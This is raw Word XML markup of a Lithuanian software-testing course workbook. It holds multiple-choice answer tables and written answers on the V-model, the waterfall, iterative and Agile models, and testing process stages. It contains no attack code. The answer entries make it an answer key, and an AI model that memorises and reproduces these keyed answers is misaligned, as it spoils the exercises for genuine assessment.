      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ĮVADAS Į TESTAVIMĄ</w:t>
      </w:r>
      <w:r w:rsidR="00082093">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>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851"/>
        <w:gridCol w:w="850"/>
        <w:gridCol w:w="709"/>
      </w:tblGrid>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Kl.#</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ts.</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Kl.#</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ts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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1</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b</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6</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c</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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2</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d</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7</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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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3</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c</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8</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b</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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4</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b</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9</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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidTr="00E350EA">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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="70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b</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="es-ES" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>DARBAS PAGAL STANDARTINĮ TEST</w:t>
      </w:r>
      <w:r w:rsidR="002476F3" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>AVIMO PROCESĄ</w:t>
      </w:r>
      <w:r w:rsidR="00082093">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">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1134"/>
        <w:gridCol w:w="2551"/>
      </w:tblGrid>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Kl.#</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ts.</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Kl.#</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ts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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1</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b</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6</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c</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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2</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d</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7</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b,c</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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3</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c</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8</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b</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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4</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Testavimo planavimas ir kontro</w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve">lė, </w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Testavimo analizė, Testavimo vykdymas, Testavimo veiklų stebėjimas ir ataskaitų teikimas, Testavimo veiklų užbaigimas.</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9</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b,c,d</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidTr="009D6E00">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="675"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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119"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c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="255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b</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PĮ KŪRIMO</w:t>
      </w:r>
      <w:r w:rsidR="002476F3" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> MODELIAI IR TESTAVIMO PROCESAS</w:t>
      </w:r>
      <w:r w:rsidR="00082093">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Pateikite 3 pagrindinius V-modelio tailymo privalumus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:contextualSpacing/>
        <w:jc w:val="bo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7"/>
        <w:gridCol w:w="5777"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidTr="00E350EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="371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pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60908E4D" wp14:editId="24B00C19">
                  <wp:extent cx="2160270" cy="1709420"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="220" name="Paveikslėlis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60270" cy="1709420"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5777"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Atsakymas:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Modelis yra paprastas,  </w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>jį lengva taikyti;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Testavimo veiklos, tokios kaip planavim</w:t>
            </w:r>
            <w:r w:rsidR="003A47AC" w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>as, testų ruošimas vyksta anksčiau prieš programavimą, taip</w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve"> taupo</w:t>
            </w:r>
            <w:r w:rsidR="003A47AC" w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>mas laikas</w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Defektai randami gan</w:t>
            </w:r>
            <w:r w:rsidR="003A47AC" w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve"> anksti  cikle;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
            <w:r w:rsidR="003A47AC" w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>erai tinka mažiems ir vidutinio</w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve"> dydžio projektams, kuriuose reikalavimai yra gerai suprantami</w:t>
            </w:r>
            <w:r w:rsidR="00C35ADB">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Para</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>šykite, kokiems projektams tinka krioklio modelis i</w:t>
      </w:r>
      <w:r w:rsidR="006C039E" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>r kokie yra jo privalumai ir trū</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>kumai IS testavimo atžvilgiu?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00082093" w:rsidRPr="00AD4464" w:rsidRDefault="00082093" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="bo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2"/>
        <w:gridCol w:w="5777"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidTr="00E350EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="371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pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10CCD2AF" wp14:editId="1CBB2E83">
                  <wp:extent cx="2226310" cy="1590040"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="221" name="Paveikslėlis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26310" cy="1590040"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5777"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Atsakymas:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Privalumai</w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Aukštas kontrolės lygis; galima projektą vykdyti per kelis departamentus;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Lengva valdyti, modelis nėra lankstus;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="006C039E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Ciklo fazė</w:t>
            </w:r>
            <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
              <w:t>s yra vykdomos ir užbaigiamos po vieną;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="006C039E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Gerai tinka</w:t>
            </w:r>
            <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
              <w:t xml:space="preserve"> mažiems projektams, kur reikalavimai yra aiškūs;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Trūkumai</w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Nėra pritaikytas reflektacijai, nežiūrima kas buvo gerai, o kas – ne;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Kai Sistema yra testavimo fazėje, jau yra labai sunku sugrįžti ir koreguoti kažką, kas nebuvo apgalvota koncepsijos fazėje;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Labai ilgą laiką turime neveikiančią sistemą;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Labai blogas modelis dideliems projektams;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Netinka projektams, kur</w:t>
            </w:r>
            <w:r w:rsidR="001F6B4D" w:rsidRPr="00AD4464">
              <w:t>iems</w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:t xml:space="preserve"> reikalavimai turi aukštą pokyčio riziką</w:t>
            </w:r>
            <w:r w:rsidR="00C35ADB">
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Koks modelis yra pateiktas paveikslėlyje? Kokiems projektams jis tinka?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>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725"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidTr="00E350EA">
        <w:trPr>
          <w:trHeight w:val="2861"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="335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pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53F40E23" wp14:editId="54CF378B">
                  <wp:extent cx="2000885" cy="1338580"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="222" name="Paveikslėlis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00885" cy="1338580"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5725"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Atsakymas:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Iteracinis modelis. Tinka didelės apimties projektams, kuriuose aukštam</w:t>
            </w:r>
            <w:r w:rsidR="006F5A67" w:rsidRPr="00AD4464">
              <w:t>e</w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:t xml:space="preserve"> lygyje reikalavimai yra griežtai apibrėžti. T.y. pagrindinė užduotis yra aiški, tačiau detalės gali kisti projekto eigoje.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Kokias grėsmes testavimui </w:t>
      </w:r>
      <w:r w:rsidR="005A33E2">
        <w:t>matote Agile modelyje? Pagrįskit</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>e.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">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5615"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidTr="00E350EA">
        <w:trPr>
          <w:trHeight w:val="2861"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3357" w:type="dxa"/>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jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C92BFBD" wp14:editId="14D29340">
                  <wp:extent cx="2133600" cy="1483995"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="2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133600" cy="1483995"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5725"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Atsakymas:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Labai daug pokyčių reikalavimuose; Nauji reikalavimai būti nesuderinami su jau turimais; yra tikimybė, kad dėl nuolatinių pokyčių projektas vėluos, truks laiko.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:ind w:left="714" w:hanging="357"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>a)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>d)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>a) d)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>a),b),c),d)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>a)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kokių yra panašumų tarp Agile (judriojo) ir iteratyvaus PĮ kūrimo modelių? Pakomentuokite.</w:t>
      </w:r>
    </w:p>
